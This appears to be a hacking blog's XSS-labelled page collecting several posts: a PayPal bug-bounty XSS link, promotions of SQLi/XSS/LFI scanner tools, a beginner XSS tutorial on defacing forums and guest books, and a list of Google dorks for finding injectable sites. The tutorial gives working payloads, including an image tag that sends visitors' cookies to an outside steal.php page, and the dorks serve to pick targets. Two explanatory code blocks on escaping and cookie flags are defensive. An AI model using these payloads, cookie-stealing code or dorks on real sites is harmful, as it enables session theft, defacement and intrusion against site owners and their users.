Showing posts with label XSS. Show all posts

Friday, April 17, 2015

XSS Bug on Paypal.com

Hello Leets,

Today I am writing about my finding on Paypal.com.

It's an XSS (Cross Site Scripting)...

The story began on the 31st of December 2014, when everyone was enjoying the New Year celebration and I was busy finding security bugs...

Then I tried hunting on the PayPal site...

After lots of tries I found a pattern to inject my code and trigger the XSS bug.


So the vulnerable parameter is
q =

Vulnerable link:
===========


https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E


The bug is fixed now and PayPal paid me a bounty of 750$...

Thanks, PayPal team....
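Why the `%22%3E` prefix in the reported link matters, shown as an added example that is not code from the post or from PayPal. The post does not say where `q` was reflected, so the `<input>` template and the helper names `qValues`, `escapeHtml`, `renderUnsafe`, `renderSafe` and `countTags` are assumptions for illustration.

```javascript
// Added example: the link is copied from the post; the page template is assumed.
const reported =
  "https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=" +
  "&q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E";

// The link carries the q parameter three times; a server may pick any of them,
// so every value has to be treated as untrusted.
function qValues(link) {
  return new URL(link).searchParams.getAll("q");
}

// Encode the characters that can end an attribute value or open a tag.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Assumed template: the search term is echoed back into an attribute value.
function renderUnsafe(q) {
  return `<input name="q" value="${q}">`;
}

function renderSafe(q) {
  return `<input name="q" value="${escapeHtml(q)}">`;
}

// Crude count of opening tags, enough to see whether the input added markup.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

const values = qValues(reported);
const last = values[values.length - 1];
console.log(values);
console.log(renderUnsafe(last), "->", countTags(renderUnsafe(last)), "tags");
console.log(renderSafe(last), "->", countTags(renderSafe(last)), "tag");
```

With the raw value, the `">` closes the attribute and the tag, so the page gains a second element; with encoding, the same input stays inside the `value` attribute as text.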

Friday, August 2, 2013

Sql Poizon Free Download


SQL POIZON



=> The Sql Poizon tool includes PHP, ASP, RFI and LFI dorks. You can scan sites using Google dorks and fix vulnerable sites. The software lets you scan sites by country. After scanning, you can crawl sites to check for vulnerabilities. You can also inject with this tool. Let's see a screenshot of this tool:














Thursday, August 1, 2013

Gr3eNoX Exploit Scanner SQLi/XSS/LFi/RFi v1.1




Updates
=======
  • XSS Scanner
  • RFi Scanner Bug fixed
  • Remove Duplicate algorithm changed



Basics of XSS injection [Beginner Tutorial]



What is Cross Site Scripting:

XSS stands for Cross Site Scripting. XSS is a vulnerability that is commonly found
in web apps. It allows a user to inject malicious code such as HTML and
JavaScript. XSS can be used to steal cookies, make phishing pages, or
just have some fun with the website.



What is a cookie:

A cookie is a text-only string that gets stored in the memory of your browser.
It is the value of a variable that a website sets. If the lifetime of this value is set
to be longer than the time you spend at that site, then the string
is saved to a file for future reference.



What can XSS do:

Cross Site Scripting is commonly used nowadays in the cyber
world. XSS can affect most websites, even ones that are up to date.
Cross Site Scripting can steal cookies from websites/forums,
make pop-ups appear where they are not supposed to (search bars,
etc.), or even run very malicious code such as
redirecting the website to another one.



Hacking forums/guest books with XSS:

Forum hacking: in order to deface or even attempt
to hack a forum, the forum must have HTML enabled so that you can
enter malicious code. If the forum does have HTML enabled,
then you can enter code such as:


+++++++
Code:

+++++++

<html>
<head><title>XSS By Safe Hacking </title></head>
<body>
<img src="javascript:alert('Defaced By Unknown')">
</body>
</html>


If the forum allows image tags, then you can use this tag to
steal people's cookies.


++++++
Code:

++++++

<img src="javascript:window.location='http://www.url.com/steal.php?account='+document.cookie">


Now for guest book hacking: the guest book you are posting on
must also be vulnerable, meaning HTML must be enabled. To see if HTML
is enabled, put these tags in your post: <B>hello world</B>. If your
text comes back bold, then HTML is enabled. Now try other techniques:
you can also put some JavaScript inside the HTML and see if that works.
Whether it does or not, you can still deface the guest book by writing
up some HTML that takes up the whole guest book page.



Defacing Websites with Cross Site Scripting:

By now you AHians know that Cross Site Scripting is used a lot nowadays to exploit
websites and forums, mostly through search functions etc. Some of the most common XSSes nowadays are in website search bars, making a box pop
up that says whatever you put in the script. Some XSS codes are:


++++++

Code:
++++++

<script>alert("Safe Hacking")</script>
<BODY ONLOAD=alert(document.cookie)>
"><script>alert("Safe Hacking");</script>
<script>window.document.write("<input type='file'>");</script>
<a rel='nofollow' href='search?searchterm=<b>safehacking made you click on link</b>'>safehacking`</a>


Now, how can I deface a website by just making one little pop-up on
the search bar page? You can redirect the site to your website or your friend's, or you can steal cookies. Make an HTML defacement page and put the whole code
in your script. You can do many things with JavaScript on a vulnerable
website.
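The cookie theft described in this tutorial depends on script being able to read `document.cookie`, which the `HttpOnly` attribute prevents. The following is an added example, not part of the original tutorial: it audits `Set-Cookie` headers for that attribute and reports whether each cookie is persistent (the "lifetime" the cookie section mentions). The header lines are constructed samples and the function names `parseSetCookie` and `auditCookie` are assumptions.

```javascript
// Constructed sample response headers, not taken from any real site.
const sampleHeaders = [
  "Set-Cookie: PHPSESSID=abc123; Path=/",
  "Set-Cookie: auth=deadbeef; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age=3600",
  "Set-Cookie: theme=dark; Expires=Wed, 01 Jan 2031 00:00:00 GMT; Path=/",
];

// Split one Set-Cookie line into name, value and lower-cased attributes.
function parseSetCookie(line) {
  const raw = line.replace(/^set-cookie:\s*/i, "");
  const [pair, ...attrs] = raw.split(";").map((p) => p.trim());
  const eq = pair.indexOf("=");
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs: {} };
  for (const a of attrs) {
    if (!a) continue;
    const i = a.indexOf("=");
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    cookie.attrs[key] = i === -1 ? true : a.slice(i + 1);
  }
  return cookie;
}

// Report the attributes whose absence makes a stolen or leaked cookie more likely.
function auditCookie(line) {
  const c = parseSetCookie(line);
  const findings = [];
  if (!c.attrs.httponly) findings.push("readable through document.cookie (no HttpOnly)");
  if (!c.attrs.secure) findings.push("also sent over plain HTTP (no Secure)");
  if (!c.attrs.samesite) findings.push("no SameSite attribute");
  // A cookie with Max-Age or Expires outlives the browser session and is saved to disk.
  const persistent = "max-age" in c.attrs || "expires" in c.attrs;
  return { name: c.name, persistent, findings };
}

for (const h of sampleHeaders) {
  console.log(auditCookie(h));
}
```

`HttpOnly` only keeps the cookie out of script; injected script can still act inside the page, so output encoding remains the actual fix.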

Wednesday, June 1, 2011

XSS Scanner 1.0






-----------------------------=[ XSS ScanneR 1.0 ]=-----------------------------
By Xylitol

I show you 20 dork examples:

inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="



top level domains for xssing (make your own dork with this TLD):

Generic top-level domains (current):

Generic:        .biz | .com | .info | .name | .net | .org | .pro
Sponsored:      .aero | .asia | .cat | .coop | .edu | .gov | .int | .jobs | .mil | .mobi | .museum | .tel | .travel
Infrastructure: .arpa

domains can have: .gov.cn | .mil.kr | gov.uk | etc..

some extensions:
.html
.asp
.aspx
.jsp
.jspx
.php

etc...
Now you know that, you are the xss dorker's king...